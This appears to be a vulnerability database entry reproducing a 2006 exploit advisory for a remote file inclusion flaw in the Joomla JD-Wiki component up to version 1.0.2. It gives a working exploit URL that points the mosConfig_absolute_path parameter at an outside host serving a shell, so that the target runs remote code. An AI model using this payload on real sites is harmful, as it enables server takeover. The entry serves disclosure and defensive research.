Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability

2006-12-05T00:00:00
ID SSV:5691
Type seebug
Reporter Root
Modified 2006-12-05T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ####################################################################################
#JD-Wiki Remote File Include
------------------------------------------------------------------------------------
JD-Wiki is the Joomla! integration of the nice DokuWiki.
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating 
documentation of any kind.
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell


Contact: irc.undernet.org #hackbsd & #ircmasters